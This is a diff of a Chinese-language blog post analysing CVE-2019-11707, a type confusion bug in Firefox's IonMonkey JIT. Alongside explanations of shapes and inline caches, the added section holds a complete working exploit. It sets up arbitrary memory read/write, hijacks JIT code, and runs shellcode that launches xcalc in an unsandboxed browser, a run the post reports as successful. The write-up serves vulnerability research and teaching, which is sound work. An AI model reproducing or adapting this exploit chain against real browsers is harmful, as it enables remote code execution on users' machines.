--- a/_posts/2025-01-12-CVE_2019_11707.md
+++ b/_posts/2025-01-12-CVE_2019_11707.md
@@ -3,7 +3,7 @@ title: CVE_2019_11707
 tags: 
 - cve
 ---
-文章较长，在侧边标题栏导航
+文章较长，在侧边标题栏导航，详细的漏洞分析在第二部分
 
 -----
 
@@ -233,7 +233,7 @@ var e=new Uint32Array(a)
 这里我们有一个对象，它有 3 个属性，如果你访问某个属性，例如 arry [1]，JavaScript 引擎会在 JSObject 中查找键字符串 '1'，然后加载相应的属性值，最后返回 [[Value]]
 ### 2. Shapes 和 Slots 的概念
 
-#### **什么是 Shape？**
+#### 什么是 Shape？
 
 `Shape` 是 JavaScript 引擎中用来描述对象结构的一种数据结构。它包含了对象的属性名称以及这些属性在内存中的位置（偏移量）等信息。
 ```javascript
@@ -295,15 +295,14 @@ logX(object2);
     [42, 43]
     ```
 
-### 3. JavaScript 内联缓存机制 (Inline Cache, IC) 的概念
+### 3. js 内联缓存机制S的概念
 
-#### **什么是内联缓存 (Inline Cache)?**
+#### 什么是Inline Cache?
 
 内联缓存（Inline Cache，简称 IC）是一种优化技术，旨在加速 JavaScript 引擎中对象属性的访问。它通过缓存对象的形状（Shape）和属性偏移量（offset），避免重复的属性查找操作，从而大幅提高性能。
 
----
 
-#### **为什么需要内联缓存？**
+#### 为什么需要内联缓存？
 内联缓存是为了解决 **属性访问的性能问题** 而被发明的。
 
 在 JavaScript 中，对象是动态的，属性可以随时添加、删除或修改。这种灵活性在引擎内部实现时会带来以下问题：
@@ -318,16 +317,16 @@ logX(object2);
 
 2. **动态行为难以预测：**
    - JavaScript 的动态特性允许对象的形状（Shape）随时变化。比如：
-     ```javascript
+```javascript
      const obj = {};
      obj.x = 10; // 动态添加属性 x
      obj.y = 20; // 动态添加属性 y
-     ```
+```
      每次对象形状发生变化，属性的存储位置也会改变，导致查找属性的成本更高。
 
 3. **多次查找的重复计算问题：**
    - 如果一个属性的访问模式是重复的，比如：
-     ```javascript
+```javascript
      function getX(o) {
        return o.x;
      }
@@ -335,10 +334,10 @@ logX(object2);
      const obj2 = { x: 20 };
      getX(obj1);
      getX(obj2);
-     ```
+```
      每次调用 `getX` 时都需要重新查找 `x` 的位置（字典查找），即使这些对象有相同的形状。
 
----
+
 
 1. **第一次访问时记录对象的形状和属性的偏移量：**
    - 当 JavaScript 引擎第一次访问对象的某个属性时，它会查找该属性的位置（通过对象的 `Shape` 和 `slots`），并将结果缓存到内联缓存中。
@@ -526,12 +525,14 @@ Property added!
 ## 类型混淆
 - 原理：IonMonkey 在内联 Arrary.prototype 时，没有检查 prototype 上的索引元素。它只检查 Array prototype 链上是否有索引元素       
 
-**例如**：
+比如
 ```javascript
 a.__proto__ --> b.__proto__ --> Array.prototype --> Object.prototype --> null
 ```
-在 a 对象实例和 Array.prototype 间插入一个 b.__proto__ 原型，那么内联 pop 函数后保存此函数的地址，并在下次调用 Array.pop 时，所有这些查找都不需要重新计算，所以此时 b.__proto__ 原型相同索引上有和 a 对象中不同的属性就会引起类型混淆（当然触发它还需要使 a 变成稀疏数组）
-- **类型混淆 poc**
+在 a 对象实例和 Array.prototype 间插入一个 b.__proto__ 原型，那么内联 pop 函数后保存此函数的地址，并在下次调用 Array.pop 时，所有这些查找都不需要重新计算，所以此时 b.__proto__ 原型相同索引上有和 a 对象中不同的属性就会引起类型混淆（当然触发它还需要使 a 变成稀疏数组）  
+
+类型混淆 poc  
+
 ```javascript
 buf = []
 for(var i=0;i<100;i++)
@@ -559,7 +560,8 @@ for (let v31 = 0; v31 < 2000; v31++) {
     vuln(18);
 }
 ```
->我们创建了一个 buf 数组，储存了 100 个 ArrayBuffer(0x20)，并用 buf [5] 以 Uint32Array 视图创建了 e 对象，然后又用 arr 数组储存了 e 对象，并且还构造了储存不同类型对象的原型插入到 a.__proto__ --> Array.prototype 之间，然后构建了造成混淆的函数，并用 2000 次循环强制引擎内联 vuln 函数以此触发漏洞
+我们创建了一个 buf 数组，储存了 100 个 ArrayBuffer(0x20)，并用 buf [5] 以 Uint32Array 视图创建了 e 对象，然后又用 arr 数组储存了 e 对象，并且还构造了储存不同类型对象的原型插入到 a.__proto__ --> Array.prototype 之间，然后构建了造成混淆的函数，并用 2000 次循环强制引擎内联 vuln 函数以此触发漏洞  
+
 1. 当 arr 数组不为空时会弹出末尾的 e 对象，然后访问第 18 个元素，但是此时是 Uint32Array 视图，索引最大值只能是 0x20//4，判断不通过, 但是此时只会访问不成功，程序并不会崩溃  
 
 ```asm
@@ -753,8 +755,9 @@ buf[7].jjj=ss    //添加新属性来触发shelcode执行
 ```
 
 
-# 环境配置
-### 攻击环境
+
+# 攻击
+## poc现场
 在 ubuntu 里建了一个文件夹，里面放入 exp.js 和 exp.html，然后在终端里执行 python 的 http.server 命令，无沙箱运行浏览器，访问对应的 ip 地址和端口号就成功了，如下图
 
 ![](https://raw.githubusercontent.com/4ak5ra/image/main/20250516000522325.png)         
@@ -763,3 +766,305 @@ buf[7].jjj=ss    //添加新属性来触发shelcode执行
 ![](https://raw.githubusercontent.com/4ak5ra/image/main/20250516000532503.png)   
 
 攻击成功
+## exp
+```javascript
+
+buf = []
+
+buf.push(new ArrayBuffer(0x20));
+buf.push(new ArrayBuffer(0x20));
+buf.push(new ArrayBuffer(0x20));
+buf.push(new ArrayBuffer(0x20));
+buf.push(new ArrayBuffer(0x20));
+buf.push(new ArrayBuffer(0x20));
+buf.push(new ArrayBuffer(0x20));
+buf.push(new ArrayBuffer(0x20));
+buf.push(new ArrayBuffer(0x20));
+buf.push(new ArrayBuffer(0x20));
+
+
+var abuf = buf[5];
+
+var e = new Uint32Array(abuf);
+const arr = [e, e, e, e, e];
+
+
+
+function vuln(a1) {
+
+
+
+    if (arr.length == 0) {
+        arr[3] = e;
+    }
+
+    const v11 = arr.pop();
+
+
+    v11[a1] = 0x80
+
+    for (let v15 = 0; v15 < 100000; v15++) {} 
+}
+
+
+p = [new Uint8Array(abuf), e, e];
+arr.__proto__ = p;
+
+for (let v31 = 0; v31 < 2000; v31++) {
+    vuln(18);
+}
+
+
+leaker = new Uint8Array(buf[7]);
+aa = new Uint8Array(buf[6]);
+
+
+
+leak = aa.slice(0x50,0x58); 
+group = aa.slice(0x40,0x48); 
+slots = aa.slice(0x40,0x48);
+leak.reverse()         
+group.reverse()
+slots.reverse()
+
+
+LS(group)
+LS(slots)
+
+leak[0]=0
+leak[1]=0
+
+
+add(leak,new data("0x38"))
+RS(leak)
+leak.reverse()
+
+
+for (var i=0;i<leak.length;i++)
+  aa[0x40+i] = leak[i]
+
+leak.reverse()
+LS(leak)
+sub(leak,new data("0x10"))
+leak.reverse()
+
+changer = new Uint8Array(buf[7])
+
+function write(addr,value){
+    for (var i=0;i<8;i++)
+      changer[i]=addr[i]
+    value.reverse()
+    for (var i=0;i<8;i++)
+      leaker[i]=value[i]
+}
+
+function read(addr){
+    for (var i=0;i<8;i++)
+      changer[i]=addr[i]
+    return leaker.slice(0,8)
+}
+
+function read_n(addr, n){
+    write(leak,n)
+    for (var i=0;i<8;i++)
+      changer[i]=addr[i]
+    return leaker
+}
+
+sub(group,new data("0x40")) 
+sub(slots,new data("0x30")) 
+print1(group)
+print1(slots)
+group.reverse()
+slots.reverse()
+
+aa = read(group) 
+aa.reverse()
+print1(aa)
+aa.reverse()
+
+grp_ptr = read(aa) 
+grp_ptr.reverse()
+print1(grp_ptr)
+grp_ptr.reverse()
+
+
+buf[7].func = function func() {
+  const magic = 4.183559446463817e-216;
+
+  const g1 = 1.4501798452584495e-277
+  const g2 = 1.4499730218924257e-277
+  const g3 = 1.4632559875735264e-277
+  const g4 = 1.4364759325952765e-277
+  const g5 = 1.450128571490163e-277
+  const g6 = 1.4501798485024445e-277
+  const g7 = 1.4345589835166586e-277
+  const g8 = 1.616527814e-314
+}
+
+
+for (i=0;i<100000;i++) buf[7].func()
+
+
+
+slots_ptr = read(slots)
+slots_ptr.reverse()
+print1(slots_ptr)
+slots_ptr.reverse()
+
+func_ptr = read(slots_ptr)
+func_ptr[6]=0
+func_ptr[7]=0
+func_ptr.reverse()
+print1(func_ptr)
+func_ptr.reverse()
+
+func_ptr.reverse()
+
+add(func_ptr,new data("0x30"))
+func_ptr.reverse()
+
+func_ptr.reverse()
+print1(func_ptr)
+func_ptr.reverse()
+
+jit_ptr=read(func_ptr);
+jit_ptr.reverse()
+print1(jit_ptr)
+jit_ptr.reverse()
+
+jitaddr = read(jit_ptr);
+
+
+jitaddr[0]=0
+jitaddr[1]=jitaddr[1] & 0xf0
+
+jitaddr.reverse()
+print1(jitaddr)
+jitaddr.reverse()
+
+jitaddr.reverse()
+sub(jitaddr,new data("0xff0"))
+jitaddr.reverse()
+
+for(j=0;j<3;j++){
+  asdf = read_n(jitaddr,new data("0xff0"))
+  offset=-1;
+  for (var i =0;i<0xff0;i++)
+  {
+    if (asdf[i]==0x37 && asdf[i+1]==0x13 && asdf[i+2]==0x37 && asdf[i+3]==0x13 && asdf[i+4]==0x37 && asdf[i+5]==0x13 && asdf[i+6]==0x37 && asdf[i+7]==0x13){
+      offset=i;
+      break
+    }
+  }
+
+ 
+  if(offset!=-1)
+    break
+
+  jitaddr.reverse()
+  add(jitaddr,new data("0xff0"))
+  jitaddr.reverse()
+}
+
+offset = offset+8+6 
+jitaddr.reverse()
+add(jitaddr,new data(offset.toString(16)))
+jitaddr.reverse()
+console.log(offset);
+
+
+jsClass = read_n(grp_ptr,new data("0x30"));
+
+name = jsClass.slice(0,8)
+flags = jsClass.slice(8,16)
+cOps = jsClass.slice(16,24)
+spec = jsClass.slice(24,32)
+ext = jsClass.slice(40,48)
+oOps = jsClass.slice(56,64)
+
+group.reverse()
+add(group,new data("0x60"))
+group.reverse()
+
+eight = new data("0x8")
+
+function addEight()
+{
+  group.reverse()
+  add(group,eight)
+  group.reverse()
+}
+
+
+function write1(addr,value){
+    for (var i=0;i<8;i++)
+      changer[i]=addr[i]
+    
+    for (var i=0;i<8;i++)
+      leaker[i]=value[i]
+}
+
+
+backingbuffer = group.slice(0,8)
+
+oops = group.slice(0,8)
+oops.reverse()
+add(oops,new data("0x30"))
+oops.reverse()
+
+write1(group,name)
+addEight()
+write1(group,flags)
+addEight()
+write1(group,oops)
+addEight()
+write1(group,spec)
+addEight()
+write1(group,ext)
+addEight()
+write1(group,oOps)
+addEight()
+
+
+write1(group,jitaddr)
+
+sc_buffer = new Uint8Array(0x1000);
+buf[7].asdf=sc_buffer
+
+
+slots_ptr.reverse()
+add(slots_ptr,eight)
+slots_ptr.reverse()
+
+sc_buffer_addr = read(slots_ptr)
+sc_buffer_addr[6]=0
+sc_buffer_addr[7]=0
+
+
+sc_buffer_addr.reverse()
+add(sc_buffer_addr,new data("0x38"))
+sc_buffer_addr.reverse()
+
+
+ptr = read(sc_buffer_addr)
+
+ptr.reverse()
+print1(ptr)
+ptr.reverse()
+
+ptr.reverse()
+ss=inttod(ptr)
+ptr.reverse()
+
+
+sc = [72, 141, 61, 73, 0, 0, 0, 72, 49, 246, 86, 87, 84, 94, 72, 49, 210, 82, 72, 141, 21, 87, 0, 0, 0, 82, 84, 90, 176, 59, 15, 5, 144, 144, 144, 144, 144, 144, 144, 144, 144, 144, 144, 144, 144, 144, 144, 144, 144, 144, 144, 144, 144, 144, 144, 144, 144, 144, 144, 144, 144, 144, 144, 144, 144, 144, 144, 144, 144, 144, 144, 144, 144, 144, 144, 144, 144, 144, 144, 144, 47, 117, 115, 114, 47, 98, 105, 110, 47, 120, 99, 97, 108, 99, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 68, 73, 83, 80, 76, 65, 89, 61, 58, 48, 0]
+
+
+for(var i=0;i<sc.length;i++)
+  sc_buffer[i]=sc[i]
+
+write1(aa,backingbuffer)
+
+buf[7].jjj=ss
+```
